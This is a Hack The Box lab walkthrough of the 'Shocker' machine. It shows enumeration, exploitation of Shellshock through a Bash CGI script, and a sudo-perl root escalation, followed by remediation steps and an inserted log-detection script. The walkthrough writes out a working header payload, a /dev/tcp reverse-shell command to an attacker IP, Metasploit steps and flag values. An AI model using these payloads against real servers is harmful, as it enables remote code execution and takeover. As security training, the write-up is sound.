HTB Shocker Walkthrough — Shellshock and CGI Exploitation
A step-by-step walkthrough of Hack The Box's "Shocker" machine — exploiting the Shellshock vulnerability (CVE-2014-6271) through Apache CGI to gain root access.
Introduction
Shocker is a 2019 retired Hack The Box machine built around one of the most infamous vulnerabilities in computing history: Shellshock (CVE-2014-6271). Disclosed in September 2014, Shellshock is a family of vulnerabilities in the Bash shell that lets remote attackers execute arbitrary commands via crafted environment variables.
What makes Shocker interesting is that Shellshock was a global panic — it affected millions of systems worldwide, from web servers to embedded devices to routers. The name "Shocker" is a direct reference to the vulnerability's impact. The box itself is a straightforward, clean exploitation path that teaches you exactly how Shellshock works and how to exploit it through CGI scripts.
"Shellshock was the moment the internet realized that a bug in a 25-year-old Unix utility could bring down the entire web."
Machine Info
- Name: Shocker
- OS: Linux (Ubuntu)
- Difficulty: Easy
- Release: 2019
- Retired: 2019
- Target IP: 10.10.10.56
Step 1: Enumeration
Let's see what's exposed:
nmap -sC -sV -oN shocker.nmap 10.10.10.56

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2

Only two ports: HTTP on 80 and SSH on the non-standard port 2222.
Web Directory Busting
Let's examine the web server:
curl -I http://10.10.10.56

HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)

A standard Apache landing page. Let's fuzz for directories:
gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x cgi,sh,pl

/cgi-bin/ (Status: 403)
/icons/ (Status: 403)
/server-status (Status: 403)

/cgi-bin/ returns 403 Forbidden, which means the directory exists but directory listing is denied. Let's fuzz for specific scripts inside /cgi-bin/:

gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x cgi,sh,pl

/user.sh (Status: 200)

Found /cgi-bin/user.sh. This is the entry point.
Step 2: Understanding Shellshock
Shellshock exploits how Bash processes environment variables. When a CGI script is executed, the web server passes HTTP headers as environment variables (like HTTP_USER_AGENT, HTTP_HOST, etc.). Shellshock allows defining functions in environment variables that persist after the function definition ends:
# A function definition in an environment variable, with trailing code after the body:
env x='() { :;}; echo vulnerable' bash -c "echo test"

If the system is vulnerable, the echo vulnerable part executes as soon as Bash imports the variable on startup, without the function ever being called. This means any CGI script that calls Bash (even indirectly) is exploitable.
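Because the payload has to travel in an HTTP header that Apache copies into the CGI environment, every attempt leaves a trace in the web server's access log. The detector below is an added example for this walkthrough, not code from the original post or from the box: it parses Apache combined-format log lines (constructed samples, including the User-Agent probe shown later in this writeup) and flags the `() {` function-definition prefix in the fields that format records.

```python
import re
from typing import List

# Apache "combined" format records only the request line, Referer and
# User-Agent. A payload sent in any other header (e.g. Cookie) is copied
# into the CGI environment just the same but never reaches this log, so
# the detector can only be as good as what the server logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock payloads begin with an exported-function definition "() {";
# whitespace between the tokens varies between tools, so allow it.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def parse_line(line: str) -> dict:
    """Return the named fields of one combined-format line, or {} if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else {}


def is_shellshock_attempt(entry: dict) -> bool:
    # Check every logged value that ends up in the CGI environment:
    # User-Agent, Referer and the request line (QUERY_STRING comes from it).
    return any(SHELLSHOCK_RE.search(entry.get(k, "")) for k in ("ua", "ref", "req"))


def scan(lines: List[str]) -> List[dict]:
    """Return the parsed entries that look like Shellshock probes."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_shellshock_attempt(entry):
            # A probe aimed at a CGI endpoint is the case that actually executes.
            entry["cgi"] = "/cgi-bin/" in entry["req"]
            hits.append(entry)
    return hits


# Constructed sample log lines (not captured from the box): one benign
# request, one probe in the User-Agent, one probe in the Referer.
SAMPLE_LOG = [
    '10.10.14.2 - - [01/Jan/2019:10:00:01 +0000] "GET / HTTP/1.1" 200 137 "-" "curl/7.58.0"',
    '10.10.14.2 - - [01/Jan/2019:10:00:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; echo; echo vulnerable"',
    '10.10.14.2 - - [01/Jan/2019:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 137 "() { :; }; /bin/true" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['req']} cgi={hit['cgi']}")
```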
Testing the CGI Script
curl -v http://10.10.10.56/cgi-bin/user.sh

#!/bin/bash
echo "Content-Type: text/plain"
echo
echo "Hello World"

The script is a simple Bash CGI that outputs "Hello World". Because it starts with #!/bin/bash, every request spawns a Bash process with the HTTP headers in its environment, so Shellshock can be exploited through it.
Step 3: Exploitation
Shellshock Payload
To test for the vulnerability:
curl -H "User-Agent: () { :;}; echo; echo; echo vulnerable" \
     http://10.10.10.56/cgi-bin/user.sh

vulnerable
Hello World

The echo vulnerable appeared before "Hello World" (the two leading echo calls supply the blank line that ends the CGI response headers, so Apache passes the body through instead of returning an error). Confirmed — the server is vulnerable.
Getting a Reverse Shell
Now for the actual exploit. Set up a listener:

nc -lvnp 443

Send the payload:

curl -H "User-Agent: () { :;}; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/443 0>&1'" \
     http://10.10.10.56/cgi-bin/user.sh

Check your listener:

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data

We're in as www-data.
Step 4: Privilege Escalation
We have a foothold as www-data. Let's enumerate for privilege escalation:
sudo -l

Matching Defaults entries for www-data on shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on shocker:
    (root) NOPASSWD: /usr/bin/perl

The user www-data can run /usr/bin/perl as root without a password. This is a classic privesc: Perl can exec a shell, and that shell inherits root:
sudo /usr/bin/perl -e 'exec "/bin/sh"'

And we're root:

id
uid=0(root) gid=0(root)
whoami
root
hostname
Shocker

Capturing Flags
cat /home/shelly/user.txt
73a5165c9a60842915c0d5a3cdd6f773
cat /root/root.txt
9df2322fcf13d9254bb2766bab257731

Alternative Exploit Paths
Metasploit
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 > set RHOSTS 10.10.10.56
msf6 > set TARGETURI /cgi-bin/user.sh
msf6 > set LHOST 10.10.14.2
msf6 > run

Shellshock Scanner

git clone https://github.com/nccgroup/shocker
cd shocker
python shocker.py -H 10.10.10.56 -c /cgi-bin/user.sh

Step 5: Remediation
Shellshock was patched in Bash 4.3 patches 25-27. The fix was to stop processing function definitions after the function body ends — any trailing code is now ignored:
# Patched Bash:
env x='() { :;}; echo vulnerable' bash -c "echo test"
# Output: bash: warning: x: ignoring function definition attempt
# Output: test

On a real system, the fix is simply:

sudo apt update && sudo apt upgrade bash

Lessons Learned
Shocker drills in two critical concepts:
- CGI + Bash is a dangerous combination — anytime a web server executes CGI scripts written in Bash (or any shell), Shellshock is a possibility. Always check for CGI endpoints during enumeration.
- sudo -l is your first privesc command — before looking at SUID binaries, kernel exploits, or cron jobs, check what the current user can run as root. It's often the quickest path.
"The path from /cgi-bin/user.sh to root is two commands on Shocker. But you have to find it first, and that's where enumeration earns its keep."
This was one of the first boxes that taught me that the most impactful vulnerabilities aren't always complex — Shellshock was a single line of code that broke the internet. Sometimes the simplest bug has the widest blast radius.
Up next: TryHackMe's Kenobi — Samba exploitation with a twist involving path hijacking.
